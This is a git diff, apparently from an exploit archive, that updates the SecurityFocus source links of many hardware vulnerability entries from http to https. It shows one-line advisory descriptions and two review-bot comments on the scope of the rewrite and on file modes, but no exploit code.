diff --git a/exploits/hardware/remote/25966.txt b/exploits/hardware/remote/25966.txt index 5bebbccb4..3afe1bdde 100644 --- a/exploits/hardware/remote/25966.txt +++ b/exploits/hardware/remote/25966.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14232/info +source: https://www.securityfocus.com/bid/14232/info Nokia Affix btsrv/btobex are reported prone to a remote command execution vulnerability. The issue exists due to a lack of input sanitization that is performed before using attacker-controlled data in a 'system()' call. diff --git a/exploits/hardware/remote/26022.txt b/exploits/hardware/remote/26022.txt index 03798e975..511bda130 100644 --- a/exploits/hardware/remote/26022.txt +++ b/exploits/hardware/remote/26022.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14364/info +source: https://www.securityfocus.com/bid/14364/info B-FOCuS Router 312+ is affected by a vulnerability that can allow unauthorized attackers to gain access to an affected device. diff --git a/exploits/hardware/remote/26168.txt b/exploits/hardware/remote/26168.txt index efd167777..e0b83de01 100644 --- a/exploits/hardware/remote/26168.txt +++ b/exploits/hardware/remote/26168.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14595/info +source: https://www.securityfocus.com/bid/14595/info The Juniper Netscreen VPN implementation will identify valid usernames in IKE aggressive mode, when pre-shared key authentication is used. This allows for attackers to obtain a list of valid VPN users. With a valid username, an attacker can obtain hashed credentials against which a brute force attack may be performed. A successful crack would mean that the attacker has complete access to the network. diff --git a/exploits/hardware/remote/27203.pl b/exploits/hardware/remote/27203.pl index 23bd6f97b..e78f1d4cc 100755 --- a/exploits/hardware/remote/27203.pl +++ b/exploits/hardware/remote/27203.pl 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16599/info +source: https://www.securityfocus.com/bid/16599/info Fortinet FortiGate is prone to a vulnerability that could allow users to bypass the device's URL filtering. diff --git a/exploits/hardware/remote/27319.txt b/exploits/hardware/remote/27319.txt index ab8396d84..0820020d5 100644 --- a/exploits/hardware/remote/27319.txt +++ b/exploits/hardware/remote/27319.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16839/info +source: https://www.securityfocus.com/bid/16839/info The SpeedTouch 500 series are prone to a cross-site scripting vulnerability. This issue is due to a failure in the devices to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/27452.txt b/exploits/hardware/remote/27452.txt index 84fdeaa1b..7810bc46c 100644 --- a/exploits/hardware/remote/27452.txt +++ b/exploits/hardware/remote/27452.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17175/info +source: https://www.securityfocus.com/bid/17175/info FirePass 4100 SSL VPN is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/27830.java b/exploits/hardware/remote/27830.java index db7cfd8e6..eb199fb80 100644 --- a/exploits/hardware/remote/27830.java +++ b/exploits/hardware/remote/27830.java @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17883/info +source: https://www.securityfocus.com/bid/17883/info Multiple Cisco products are susceptible to a content-filtering bypass vulnerability. This issue is due to a failure of the software to properly recognize HTTP request traffic. diff --git a/exploits/hardware/remote/27891.txt b/exploits/hardware/remote/27891.txt index 592c29f0c..bf21f7c8b 100644 --- a/exploits/hardware/remote/27891.txt +++ b/exploits/hardware/remote/27891.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18019/info +source: https://www.securityfocus.com/bid/18019/info Ipswitch WhatsUp Professional 2006 is susceptible to a remote authentication-bypass vulnerability. diff --git a/exploits/hardware/remote/27892.txt b/exploits/hardware/remote/27892.txt index 910a582f3..718ae39da 100644 --- a/exploits/hardware/remote/27892.txt +++ b/exploits/hardware/remote/27892.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18022/info +source: https://www.securityfocus.com/bid/18022/info The Mobotix IP camera is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the device to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/27893.txt b/exploits/hardware/remote/27893.txt index bab1e3dfa..f5229a7d1 100644 --- a/exploits/hardware/remote/27893.txt +++ b/exploits/hardware/remote/27893.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18022/info +source: https://www.securityfocus.com/bid/18022/info The Mobotix IP camera is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the device to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/27894.txt b/exploits/hardware/remote/27894.txt index 683d12d45..526e7c9e0 100644 --- a/exploits/hardware/remote/27894.txt +++ b/exploits/hardware/remote/27894.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18022/info +source: https://www.securityfocus.com/bid/18022/info The Mobotix IP camera is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the device to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/27923.txt b/exploits/hardware/remote/27923.txt index 00649f778..b81b80210 100644 --- a/exploits/hardware/remote/27923.txt +++ b/exploits/hardware/remote/27923.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18168/info +source: https://www.securityfocus.com/bid/18168/info The D-Link Airspot DSA-3100 Gateway device is prone to a cross-site scripting vulnerability. This issue is due to a failure to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/28245.pl b/exploits/hardware/remote/28245.pl index 7ccbc7fd3..c61471219 100755 --- a/exploits/hardware/remote/28245.pl +++ b/exploits/hardware/remote/28245.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19075/info +source: https://www.securityfocus.com/bid/19075/info Cisco Security Monitoring, Analysis and Response System (CS-MARS) is prone to a vulnerability that could permit the execution of arbitrary commands. diff --git a/exploits/hardware/remote/28847.txt b/exploits/hardware/remote/28847.txt index 3cca32d6d..5556db490 100644 --- a/exploits/hardware/remote/28847.txt +++ b/exploits/hardware/remote/28847.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20689/info +source: https://www.securityfocus.com/bid/20689/info D-Link DSL-G624T devices are prone to a remote information-disclosure vulnerability because the devices fail to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/28848.txt b/exploits/hardware/remote/28848.txt index c3036e68d..a9888c7b8 100644 --- a/exploits/hardware/remote/28848.txt +++ b/exploits/hardware/remote/28848.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20696/info +source: https://www.securityfocus.com/bid/20696/info INCA IM-204 devices are prone to a remote information-disclosure vulnerability because the devices fail to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/28888.txt b/exploits/hardware/remote/28888.txt index 0dacac0e0..eec2902d7 100644 --- a/exploits/hardware/remote/28888.txt +++ b/exploits/hardware/remote/28888.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20834/info +source: https://www.securityfocus.com/bid/20834/info ECI Telecom's B-FOCuS ADSL2+ Combo332+ wireless router is prone to an information-disclosure vulnerability. The router's Web-Based Management interface fails to authenticate users before providing access to sensitive information. diff --git a/exploits/hardware/remote/29735.rb b/exploits/hardware/remote/29735.rb index acd14d11f..7433d78a4 100755 --- a/exploits/hardware/remote/29735.rb +++ b/exploits/hardware/remote/29735.rb @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22923/info +source: https://www.securityfocus.com/bid/22923/info D-Link TFTP is prone to a buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied data before storing it in a finite-sized buffer. diff --git a/exploits/hardware/remote/29945.txt b/exploits/hardware/remote/29945.txt index f98ec3596..95fb2f496 100644 --- a/exploits/hardware/remote/29945.txt +++ b/exploits/hardware/remote/29945.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23802/info +source: https://www.securityfocus.com/bid/23802/info D-Link DSL-G624T is prone to a cross-site scripting vulnerability. This issue is due to a failure to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/30164.txt b/exploits/hardware/remote/30164.txt index 276861991..dc9be4694 100644 --- a/exploits/hardware/remote/30164.txt +++ b/exploits/hardware/remote/30164.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24374/info +source: https://www.securityfocus.com/bid/24374/info OfficeConnect Secure Router is prone to a cross-site scripting vulnerability. diff --git a/exploits/hardware/remote/30254.txt b/exploits/hardware/remote/30254.txt index 940af08a6..82e1cd256 100644 --- a/exploits/hardware/remote/30254.txt +++ b/exploits/hardware/remote/30254.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24682/info +source: https://www.securityfocus.com/bid/24682/info Linksys Wireless-G ADSL Gateway is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/30485.html b/exploits/hardware/remote/30485.html index 5729fde15..bb067bbfd 100644 --- a/exploits/hardware/remote/30485.html +++ b/exploits/hardware/remote/30485.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25262/info +source: https://www.securityfocus.com/bid/25262/info ZyXEL ZyWALL 2 is prone to multiple remote vulnerabilities that affect the management interface. diff --git a/exploits/hardware/remote/30650.txt b/exploits/hardware/remote/30650.txt index 38fc86368..e5f7b572d 100644 --- a/exploits/hardware/remote/30650.txt +++ b/exploits/hardware/remote/30650.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25987/info +source: https://www.securityfocus.com/bid/25987/info Linksys SPA941 devices are prone to an HTML-injection vulnerability because the built-in webserver fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/hardware/remote/30652.txt b/exploits/hardware/remote/30652.txt index c1c9cce2d..80d3c6e29 100644 --- a/exploits/hardware/remote/30652.txt +++ b/exploits/hardware/remote/30652.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26001/info +source: https://www.securityfocus.com/bid/26001/info Cisco IOS is prone to a remote buffer-overflow vulnerability in its LPD service because it fails to perform adequate boundary checks on user-supplied data. diff --git a/exploits/hardware/remote/30673.txt b/exploits/hardware/remote/30673.txt index 29cb17754..d638133ca 100644 --- a/exploits/hardware/remote/30673.txt +++ b/exploits/hardware/remote/30673.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26073/info +source: https://www.securityfocus.com/bid/26073/info NETGEAR ProSafe SSL VPN Concentrator 25-SSL312 is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/30740.html b/exploits/hardware/remote/30740.html index 1d6c466ce..11436f763 100644 --- a/exploits/hardware/remote/30740.html +++ b/exploits/hardware/remote/30740.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26333/info +source: https://www.securityfocus.com/bid/26333/info BT Home Hub is prone to an authentication-bypass vulnerability. diff --git a/exploits/hardware/remote/30755.txt b/exploits/hardware/remote/30755.txt index c7a020332..5fef5c0a5 100644 --- a/exploits/hardware/remote/30755.txt +++ b/exploits/hardware/remote/30755.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26412/info +source: https://www.securityfocus.com/bid/26412/info F5 FirePass 4100 SSL VPN devices are prone to a cross-site scripting vulnerability because they fail to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/30833.html b/exploits/hardware/remote/30833.html index fda561271..18270f685 100644 --- a/exploits/hardware/remote/30833.html +++ b/exploits/hardware/remote/30833.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26659/info +source: https://www.securityfocus.com/bid/26659/info F5 Networks FirePass 4100 SSL VPN devices are prone to a cross-site scripting vulnerability because they fail to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/30834.txt b/exploits/hardware/remote/30834.txt index d7b56c994..1f61e3531 100644 --- a/exploits/hardware/remote/30834.txt +++ b/exploits/hardware/remote/30834.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26661/info +source: https://www.securityfocus.com/bid/26661/info F5 Networks FirePass 4100 SSL VPN devices are prone to a cross-site scripting vulnerability because they fail to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/30882.txt b/exploits/hardware/remote/30882.txt index d53c4e473..d448cd06e 100644 --- a/exploits/hardware/remote/30882.txt +++ b/exploits/hardware/remote/30882.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26808/info +source: https://www.securityfocus.com/bid/26808/info Thomson SpeedTouch 716 is prone to a cross-site scripting vulnerability because the device fails to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/30935.txt b/exploits/hardware/remote/30935.txt index 9abf5abd5..041b52c61 100644 --- a/exploits/hardware/remote/30935.txt +++ b/exploits/hardware/remote/30935.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27024/info +source: https://www.securityfocus.com/bid/27024/info ZyXEL P-330W 802.11g Secure Wireless Internet Sharing Router is prone to multiple cross-site scripting vulnerabilities and cross-site request-forgery vulnerabilities because it fails to properly sanitize user-supplied input. These issues affect the device's web-based administrative interface. diff --git a/exploits/hardware/remote/31013.txt b/exploits/hardware/remote/31013.txt index 9a82fc702..e1648fcbe 100644 --- a/exploits/hardware/remote/31013.txt +++ b/exploits/hardware/remote/31013.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27246/info +source: https://www.securityfocus.com/bid/27246/info Multiple 2Wire routers are prone to a cross-site request-forgery vulnerability. diff --git a/exploits/hardware/remote/31024.txt b/exploits/hardware/remote/31024.txt index 673098b63..a869080af 100644 --- a/exploits/hardware/remote/31024.txt +++ b/exploits/hardware/remote/31024.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27272/info +source: https://www.securityfocus.com/bid/27272/info F5 BIG-IP is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/31026.pl b/exploits/hardware/remote/31026.pl index bd6e29a95..4d6602194 100755 --- a/exploits/hardware/remote/31026.pl +++ b/exploits/hardware/remote/31026.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27276/info +source: https://www.securityfocus.com/bid/27276/info Fortinet Fortigate is prone to a vulnerability that can allow attackers to bypass the device's URL filtering. diff --git a/exploits/hardware/remote/31031.txt b/exploits/hardware/remote/31031.txt index 3e327cf28..cc8cf645d 100644 --- a/exploits/hardware/remote/31031.txt +++ b/exploits/hardware/remote/31031.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27309/info +source: https://www.securityfocus.com/bid/27309/info 8e6 R3000 Internet Filter is prone to a vulnerability that allows attackers to bypass URI filters. diff --git a/exploits/hardware/remote/31078.txt b/exploits/hardware/remote/31078.txt index 69e826a89..999997b13 100644 --- a/exploits/hardware/remote/31078.txt +++ b/exploits/hardware/remote/31078.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27516/info +source: https://www.securityfocus.com/bid/27516/info Multiple 2Wire routers are prone to an access-validation vulnerability because they fail to adequately authenticate users before performing certain actions. diff --git a/exploits/hardware/remote/31132.txt b/exploits/hardware/remote/31132.txt index 1dc0e3d7f..3e72d94ab 100644 --- a/exploits/hardware/remote/31132.txt +++ b/exploits/hardware/remote/31132.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27718/info +source: https://www.securityfocus.com/bid/27718/info ExtremeZ-IP File and Print servers are prone to multiple vulnerabilities including denial-of-service and information-disclosure issues. diff --git a/exploits/hardware/remote/31133.txt b/exploits/hardware/remote/31133.txt index 1e1c1d07a..6925005e3 100644 --- a/exploits/hardware/remote/31133.txt +++ b/exploits/hardware/remote/31133.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27720/info +source: https://www.securityfocus.com/bid/27720/info F5 BIG-IP is prone to a cross-site request-forgery vulnerability. diff --git a/exploits/hardware/remote/31298.txt b/exploits/hardware/remote/31298.txt index 0739f87fe..06b51e216 100644 --- a/exploits/hardware/remote/31298.txt +++ b/exploits/hardware/remote/31298.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27982/info +source: https://www.securityfocus.com/bid/27982/info Packeteer PacketShaper and PolicyCenter are prone to a cross-site scripting vulnerability because they fail to sufficiently sanitize user-supplied input data. diff --git a/exploits/hardware/remote/31311.txt b/exploits/hardware/remote/31311.txt index 3d79074b7..2a1e32aff 100644 --- a/exploits/hardware/remote/31311.txt +++ b/exploits/hardware/remote/31311.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28034/info +source: https://www.securityfocus.com/bid/28034/info Juniper Networks Secure Access 2000 is prone to a cross-site scripting vulnerability because it fails to adequately sanitize user-supplied input. diff --git a/exploits/hardware/remote/31340.html b/exploits/hardware/remote/31340.html index ae3de53d3..c7d471009 100644 --- a/exploits/hardware/remote/31340.html +++ b/exploits/hardware/remote/31340.html 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28116/info +source: https://www.securityfocus.com/bid/28116/info Check Point VPN-1 UTM Edge is prone to a cross-site scripting vulnerability because it fails to adequately sanitize user-supplied input. diff --git a/exploits/hardware/remote/31342.txt b/exploits/hardware/remote/31342.txt index 105971425..a7eb951c2 100644 --- a/exploits/hardware/remote/31342.txt +++ b/exploits/hardware/remote/31342.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28122/info +source: https://www.securityfocus.com/bid/28122/info Airspan ProST WiMAX device is prone to an authentication-bypass vulnerability because it fails to perform adequate authentication checks in the web interface. diff --git a/exploits/hardware/remote/31364.txt b/exploits/hardware/remote/31364.txt index 836cbe2c7..df94d091c 100644 --- a/exploits/hardware/remote/31364.txt +++ b/exploits/hardware/remote/31364.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28151/info +source: https://www.securityfocus.com/bid/28151/info F5 BIG-IP Web Management Interface is prone to a HTML-injection vulnerability because the web management interface fails to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/31698.txt b/exploits/hardware/remote/31698.txt index 948832f31..53dcd974b 100644 --- a/exploits/hardware/remote/31698.txt +++ b/exploits/hardware/remote/31698.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28902/info +source: https://www.securityfocus.com/bid/28902/info F5 Networks FirePass 4100 SSL VPN devices are prone to a cross-site scripting vulnerability because they fail to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/31828.txt b/exploits/hardware/remote/31828.txt index c80ebc098..f51d2f998 100644 --- a/exploits/hardware/remote/31828.txt +++ b/exploits/hardware/remote/31828.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29340/info +source: https://www.securityfocus.com/bid/29340/info Barracuda Spam Firewall is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/31862.txt b/exploits/hardware/remote/31862.txt index 23a9113a8..7866aabae 100644 --- a/exploits/hardware/remote/31862.txt +++ b/exploits/hardware/remote/31862.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29430/info +source: https://www.securityfocus.com/bid/29430/info Xerox DocuShare is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/hardware/remote/31863.txt b/exploits/hardware/remote/31863.txt index a47b24f59..e6b9ade2a 100644 --- a/exploits/hardware/remote/31863.txt +++ b/exploits/hardware/remote/31863.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29430/info +source: https://www.securityfocus.com/bid/29430/info Xerox DocuShare is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/hardware/remote/31864.txt b/exploits/hardware/remote/31864.txt index 91f949d54..4935011cf 100644 --- a/exploits/hardware/remote/31864.txt +++ b/exploits/hardware/remote/31864.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29430/info +source: https://www.securityfocus.com/bid/29430/info Xerox DocuShare is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/hardware/remote/31885.txt b/exploits/hardware/remote/31885.txt index a8b2ee63d..64383cc19 100644 --- a/exploits/hardware/remote/31885.txt +++ b/exploits/hardware/remote/31885.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29574/info +source: https://www.securityfocus.com/bid/29574/info F5 FirePass SSL VPN is prone to multiple cross-site request-forgery vulnerabilities because it fails to adequately sanitize user-supplied input. 
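Review bot: The scope of the rewrite is not stated, and every hunk changes only line 1 (`@@ -1,4 +1,4 @@`, the `source:` header), as in 31862.txt, 31863.txt and 31864.txt, which all point at bid/29430. If the substitution was anchored to the `source:` prefix, any other `http://www.securityfocus.com` reference deeper in these files is still plain HTTP. Please confirm with a repository-wide search for the old prefix, or say in the commit message that only the header line was in scope.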
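Review bot: File modes are inconsistent across the script files touched above: 27203.pl, 28245.pl, 29735.rb and 31026.pl are carried at mode 100755, while 27830.java, 30485.html and 30740.html are 100644. Line 1 of each 100755 file is the plain-text `source:` header rather than an interpreter line, so the executable bit serves no purpose on archived material. Since this commit already touches each of these files, consider normalizing them to 100644 here or in a follow-up.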
diff --git a/exploits/hardware/remote/31886.txt b/exploits/hardware/remote/31886.txt index b0d6a48d5..b7415c08e 100644 --- a/exploits/hardware/remote/31886.txt +++ b/exploits/hardware/remote/31886.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29574/info +source: https://www.securityfocus.com/bid/29574/info F5 FirePass SSL VPN is prone to multiple cross-site request-forgery vulnerabilities because it fails to adequately sanitize user-supplied input. diff --git a/exploits/hardware/remote/32336.txt b/exploits/hardware/remote/32336.txt index 109d77c30..3fe6d6dd4 100644 --- a/exploits/hardware/remote/32336.txt +++ b/exploits/hardware/remote/32336.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31050/info +source: https://www.securityfocus.com/bid/31050/info D-Link DIR-100 is affected by a vulnerability that allows attackers to bypass security restrictions and access sites that are blocked by an administrator. diff --git a/exploits/hardware/remote/32390.html b/exploits/hardware/remote/32390.html index e39d6f74d..34040b3a9 100644 --- a/exploits/hardware/remote/32390.html +++ b/exploits/hardware/remote/32390.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31218/info +source: https://www.securityfocus.com/bid/31218/info The Cisco 871 Integrated Services Router is prone to a cross-site request-forgery vulnerability. diff --git a/exploits/hardware/remote/32391.html b/exploits/hardware/remote/32391.html index fb8cf00dc..d93c96dfa 100644 --- a/exploits/hardware/remote/32391.html +++ b/exploits/hardware/remote/32391.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31218/info +source: https://www.securityfocus.com/bid/31218/info The Cisco 871 Integrated Services Router is prone to a cross-site request-forgery vulnerability. diff --git a/exploits/hardware/remote/32469.txt b/exploits/hardware/remote/32469.txt index 5c1751756..7f8fc8c89 100644 --- a/exploits/hardware/remote/32469.txt +++ b/exploits/hardware/remote/32469.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31666/info +source: https://www.securityfocus.com/bid/31666/info The Proxim Tsunami MP.11 2411 Wireless Access Point is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/hardware/remote/32552.txt b/exploits/hardware/remote/32552.txt index 482ae6ea0..31fb65291 100644 --- a/exploits/hardware/remote/32552.txt +++ b/exploits/hardware/remote/32552.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31998/info +source: https://www.securityfocus.com/bid/31998/info SonicWALL Content Filtering is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input when displaying URI address data in a blocked-site error page. diff --git a/exploits/hardware/remote/32582.txt b/exploits/hardware/remote/32582.txt index bad0015ec..86ef8041b 100644 --- a/exploits/hardware/remote/32582.txt +++ b/exploits/hardware/remote/32582.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/32275/info +source: https://www.securityfocus.com/bid/32275/info The Belkin F5D8233-4 Wireless N Router is prone to multiple vulnerabilities because of a lack of authentication when users access specific administration scripts. diff --git a/exploits/hardware/remote/32591.txt b/exploits/hardware/remote/32591.txt index 03df6916c..85f1cca14 100644 --- a/exploits/hardware/remote/32591.txt +++ b/exploits/hardware/remote/32591.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/32358/info +source: https://www.securityfocus.com/bid/32358/info 3Com Wireless 8760 Dual-Radio 11a/b/g PoE Access Point is prone to multiple security vulnerabilities, including an HTML-injection issue and an authentication-bypass issue. diff --git a/exploits/hardware/remote/32599.txt b/exploits/hardware/remote/32599.txt index 87d538d1d..1f4d91bba 100644 --- a/exploits/hardware/remote/32599.txt 
+++ b/exploits/hardware/remote/32599.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/32496/info +source: https://www.securityfocus.com/bid/32496/info Linksys WRT160N is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/32681.txt b/exploits/hardware/remote/32681.txt index aaefb59b5..92162c5e1 100644 --- a/exploits/hardware/remote/32681.txt +++ b/exploits/hardware/remote/32681.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/32975/info +source: https://www.securityfocus.com/bid/32975/info COMTREND CT-536 and HG-536 are prone to multiple remote vulnerabilities: diff --git a/exploits/hardware/remote/32723.txt b/exploits/hardware/remote/32723.txt index cbe211833..2c8845e59 100644 --- a/exploits/hardware/remote/32723.txt +++ b/exploits/hardware/remote/32723.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33260/info +source: https://www.securityfocus.com/bid/33260/info Cisco IOS HTTP Server is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/hardware/remote/32776.txt b/exploits/hardware/remote/32776.txt index a313aeee8..f9da3faca 100644 --- a/exploits/hardware/remote/32776.txt +++ b/exploits/hardware/remote/32776.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33625/info +source: https://www.securityfocus.com/bid/33625/info Cisco IOS HTTP Server is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/32801.txt b/exploits/hardware/remote/32801.txt index 3f0ac0e62..a362ddcc7 100644 --- a/exploits/hardware/remote/32801.txt +++ b/exploits/hardware/remote/32801.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33779/info +source: https://www.securityfocus.com/bid/33779/info Barracuda Load Balancer is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/hardware/remote/32878.txt b/exploits/hardware/remote/32878.txt index 6ae17cffc..0b5b44175 100644 --- a/exploits/hardware/remote/32878.txt +++ b/exploits/hardware/remote/32878.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34307/info +source: https://www.securityfocus.com/bid/34307/info Cisco ASA is prone to a cross-site scripting vulnerability. diff --git a/exploits/hardware/remote/32931.html b/exploits/hardware/remote/32931.html index d1a2e2af7..399be1a80 100644 --- a/exploits/hardware/remote/32931.html +++ b/exploits/hardware/remote/32931.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34616/info +source: https://www.securityfocus.com/bid/34616/info The Linksys WRT54GC router is prone to an access-validation vulnerability because of a lack of authentication when users access specific administration applications. diff --git a/exploits/hardware/remote/32954.txt b/exploits/hardware/remote/32954.txt index d142defbb..b04c65bb9 100644 --- a/exploits/hardware/remote/32954.txt +++ b/exploits/hardware/remote/32954.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34713/info +source: https://www.securityfocus.com/bid/34713/info Linksys WVC54GCA Wireless-G Internet Home Monitoring Camera is prone to multiple directory-traversal vulnerabilities because the software fails to sufficiently sanitize user-supplied input. diff --git a/exploits/hardware/remote/32955.js b/exploits/hardware/remote/32955.js index 64b5344ab..8cf3d69aa 100644 --- a/exploits/hardware/remote/32955.js +++ b/exploits/hardware/remote/32955.js 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34714/info +source: https://www.securityfocus.com/bid/34714/info Linksys WVC54GCA Wireless-G Internet Home Monitoring Camera is prone to multiple cross-site scripting vulnerabilities because the software fails to sufficiently sanitize user-supplied data. diff --git a/exploits/hardware/remote/33010.txt b/exploits/hardware/remote/33010.txt index 0114e7f41..11f78f101 100644 --- a/exploits/hardware/remote/33010.txt +++ b/exploits/hardware/remote/33010.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35093/info +source: https://www.securityfocus.com/bid/35093/info SonicWALL Global VPN Client is prone to a remote format-string vulnerability because it fails to properly sanitize user-supplied input before passing it as the format specifier to a formatted-printing function. diff --git a/exploits/hardware/remote/33016.txt b/exploits/hardware/remote/33016.txt index 6b69c8ac5..8692e36fc 100644 --- a/exploits/hardware/remote/33016.txt +++ b/exploits/hardware/remote/33016.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35145/info +source: https://www.securityfocus.com/bid/35145/info Multiple SonicWALL SSL-VPN devices are prone to a remote format-string vulnerability because they fail to properly sanitize user-supplied input before passing it as the format specifier to a formatted-printing function. diff --git a/exploits/hardware/remote/33044.html b/exploits/hardware/remote/33044.html index aae6baee2..2fbdf9f28 100644 --- a/exploits/hardware/remote/33044.html +++ b/exploits/hardware/remote/33044.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35425/info +source: https://www.securityfocus.com/bid/35425/info Apple iPhone is prone to a security-bypass vulnerability that may cause a call to be placed automatically. diff --git a/exploits/hardware/remote/33045.html b/exploits/hardware/remote/33045.html index bb665c26f..14566e3dc 100644 --- a/exploits/hardware/remote/33045.html 
